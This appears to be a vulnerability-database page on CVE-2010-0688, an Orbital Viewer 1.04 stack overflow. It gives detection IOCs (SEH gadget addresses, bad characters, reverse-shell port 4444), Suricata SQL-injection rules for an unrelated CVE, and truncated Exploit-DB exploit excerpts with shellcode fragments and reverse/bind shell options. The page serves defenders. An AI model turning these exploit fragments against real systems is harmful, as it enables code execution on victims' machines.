CVE-2010-0688
published 2010-03-19CVE-2010-0688: Stack-based buffer overflow in Orbital Viewer 1.04 allows user-assisted remote attackers to execute arbitrary code via a crafted (1) .orb or (2) .ov file.
PriorityP350critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
37.90%
98.4th percentile
Stack-based buffer overflow in Orbital Viewer 1.04 allows user-assisted remote attackers to execute arbitrary code via a crafted (1) .orb or (2) .ov file.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| orbitals | orbital_viewer | — | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
OrbitalFileV1.0
bytes↗
OrbitalFileV1.0
bytes↗
\x50\x82\x45
bytes↗
\x0b\x0b\x27\x00
bytes↗
\xeb\xf9\x90\x90
bytes↗
\xeb\xf9\xff\xff
bytes↗
\xe9\xc8\xf9\xff\xff
bytes↗
\xe9\x52\xfe\xff\xff
- →Malicious .orb or .ov files begin with the magic header 'OrbitalFileV1.0' followed by CR/LF or LF. Files exploiting CVE-2010-0688 contain this header followed by a large (~5045–6060 byte) buffer of padding, NOP sleds, and shellcode before SEH overwrite bytes. ↗
- →The overflow is triggered via fscanf reading into a fixed-size stack buffer with no bounds checking when parsing .ORB files. Look for abnormally large single-line content (thousands of bytes) in .orb/.ov files after the OrbitalFileV1.0 header. ↗
- →SEH-based exploitation: monitor for SEH chain overwrites in ov.exe process. Known PPR gadget addresses used: 0x004032a2 (Metasploit module) and partial overwrite 0x??4582 50 from ov.exe. ↗
- →Bad characters for payload encoding in this exploit are: \x00\x09\x0a\x0d\x20 — any shellcode in a malicious .orb file will avoid these bytes. ↗
- →Reverse shell payload in exploit connects back on port 4444 from victim to attacker IP 192.168.2.10; bind shell listens on port 4444 on victim (RHOST=192.168.2.55). Network detection should alert on unexpected outbound connections from ov.exe. ↗
- ·The partial SEH overwrite address (\x50\x82\x45) from exploit 11581 is a 3-byte partial overwrite specific to ov.exe on Windows XP SP3 and may differ across builds/service packs. ↗
- ·The PPR gadget at 0x00457C03 used in exploit 13940 is labeled 'universal' but is specific to ov.exe on Windows XP SP2. ↗
- ·The Metasploit module PPR gadget 0x004032a2 is specific to ov.exe version 1.0.0.2 on Windows XP SP3; different versions of ov.exe will require different return addresses. ↗
- ·Payload space is limited to 2048 bytes in the Metasploit module due to the fixed-size stack buffer constraint. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Suricata
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0688 [HIGH] ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UPDATE"; flow:established,to_server; http.uri; content:"/oku.asp?"; nocase; content:"id="; nocase; content:"UPDATE"; nocase; content:"SET"; nocase; distance:0; reference:cve,CVE-2007-0688; reference:url,www.milw0rm.com/exploits/3241; classtype:web-application-attack; sid:2005068; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techni
Suricata
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0688 [HIGH] ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id SELECT
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id SELECT"; flow:established,to_server; http.uri; content:"/oku.asp?"; nocase; content:"id="; nocase; content:"SELECT"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0688; reference:url,www.milw0rm.com/exploits/3241; classtype:web-application-attack; sid:2005063; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UNION SELECT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0688 [HIGH] ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UNION SELECT
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UNION SELECT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id UNION SELECT"; flow:established,to_server; http.uri; content:"/oku.asp?"; nocase; content:"id="; nocase; content:"UNION"; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0688; reference:url,www.milw0rm.com/exploits/3241; classtype:web-application-attack; sid:2005064; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access
Suricata
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id ASCII
suricata·2010-07-30·CVSS 7.5
CVE-2007-0688 [HIGH] ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id ASCII
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id ASCII
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id ASCII"; flow:established,to_server; http.uri; content:"/oku.asp?"; nocase; content:"id="; nocase; content:"ASCII("; nocase; content:"SELECT"; nocase; distance:0; reference:cve,CVE-2007-0688; reference:url,www.milw0rm.com/exploits/3241; classtype:web-application-attack; sid:2005067; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id DELETE
suricata·2010-07-30·CVSS 7.5
CVE-2007-0688 [HIGH] ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id DELETE
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id DELETE
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id DELETE"; flow:established,to_server; http.uri; content:"/oku.asp?"; nocase; content:"id="; nocase; content:"DELETE"; nocase; content:"FROM"; nocase; distance:0; reference:cve,CVE-2007-0688; reference:url,www.milw0rm.com/exploits/3241; classtype:web-application-attack; sid:2005066; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Suricata
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id INSERT
suricata·2010-07-30·CVSS 7.5
CVE-2007-0688 [HIGH] ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id INSERT
ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id INSERT
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Hunkaray Duyuru Scripti SQL Injection Attempt -- oku.asp id INSERT"; flow:established,to_server; http.uri; content:"/oku.asp?"; nocase; content:"id="; nocase; content:"INSERT"; nocase; content:"INTO"; nocase; distance:0; reference:cve,CVE-2007-0688; reference:url,www.milw0rm.com/exploits/3241; classtype:web-application-attack; sid:2005065; rev:9; metadata:affected_product Web_Server_Applications, attack_target Web_Server, created_at 2010_07_30, deployment Datacenter, confidence Medium, signature_severity Major, tag SQL_Injection, updated_at 2020_09_11, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_techn
Exploit-DB
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
exploitdb·2020-03-02·CVSS 8.8
CVE-2020-0688 [HIGH] Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
---
# Exploit Title: Microsoft Exchange 2019 15.2.221.12 - Authenticated Remote Code Execution
# Date: 2020-02-28
# Exploit Author: Photubias
# Vendor Advisory: [1] https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688
# [2] https://www.thezdi.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys
# Vendor Homepage: https://www.microsoft.com
# Version: MS Exchange Server 2010 SP3 up to 2019 CU4
# Tested on: MS Exchange 2019 v15.2.221.12 running on Windows Server 2019
# CVE: CVE-2020-0688
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Copyright 2020 Photubias(c)
This program is free software: you can redistribute it and/
Exploit-DB
Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)
exploitdb·2010-06-19
CVE-2010-0688 Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)
Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)
---
#!usr/bin/perl
#########################################################################################
#Pro: Orbital Viewer v1.04 (.orb/.ov) Local Universal Stack Overflow Exploit [SEH]
#Author: Crazy_Hacker
#Download: http://www.orbitals.com/orb/setupov.exe
#Date: 20-6-2010
#Tested: WinXp SP2
##########################################################################################
$junk = 6060;
$header = "OrbitalFileV1.0\n";
$nseh = "\xeb\xf9\xff\xff"; # jmp back 7 bytes
$seh = "\x0b\x0b\x27\x00"; # universal pop ebx - pop eax - ret at 0x00457C03 [ov.exe]
$fly_by = "\xe9\x52\xfe\xff\xff"; # jmp back 430 bytes = land on A's => nops => shellcode
#calc
$shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x4
Exploit-DB
Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)
exploitdb·2010-03-09
CVE-2010-0688 Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)
Orbital Viewer - '.ORB' File Parsing Buffer Overflow (Metasploit)
---
##
# $Id: orbital_viewer_orb.rb 8757 2010-03-09 05:57:22Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Orbital Viewer ORB File Parsing Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in David Manthey's
Orbital Viewer. When processing .ORB files, data is read from file into
a fixed-size stack buffer using the fscanf function. Since no bounds
checking is done, a buffer overflow can occur. Attackers can execute
arbitrary c
Exploit-DB
Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)
exploitdb·2010-02-26·CVSS 9.3
CVE-2010-0688 [CRITICAL] Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)
Orbital Viewer 1.04 - '.orb' File Local Universal Overflow (SEH)
---
#!/usr/bin/python
#
################################################################
#
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: \x00\x0a\xbd\x0d\x20
# Here we go.. ! ...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
# 1: calc.exe
# 2: reverse shell
# 3: bind shell
# [+] which shellcode? 2
# [+] Vu
Metasploit
Orbital Viewer ORB File Parsing Buffer Overflow
metasploit
Orbital Viewer ORB File Parsing Buffer Overflow
Orbital Viewer ORB File Parsing Buffer Overflow
This module exploits a stack-based buffer overflow in David Manthey's Orbital Viewer. When processing .ORB files, data is read from file into a fixed-size stack buffer using the fscanf function. Since no bounds checking is done, a buffer overflow can occur. Attackers can execute arbitrary code by convincing their victim to open an ORB file.
No writeups or analysis indexed.
http://secunia.com/advisories/38720http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/http://www.exploit-db.com/exploits/13940http://www.osvdb.org/62580http://www.securityfocus.com/bid/38436http://www.securityfocus.com/bid/40985http://www.vupen.com/english/advisories/2010/0478https://exchange.xforce.ibmcloud.com/vulnerabilities/59560http://secunia.com/advisories/38720http://www.corelan.be:8800/index.php/forum/security-advisories/corelan-10-011-orbital-viewer-orb-buffer-overflow/http://www.exploit-db.com/exploits/13940http://www.osvdb.org/62580http://www.securityfocus.com/bid/38436http://www.securityfocus.com/bid/40985http://www.vupen.com/english/advisories/2010/0478https://exchange.xforce.ibmcloud.com/vulnerabilities/59560
2010-03-19
Published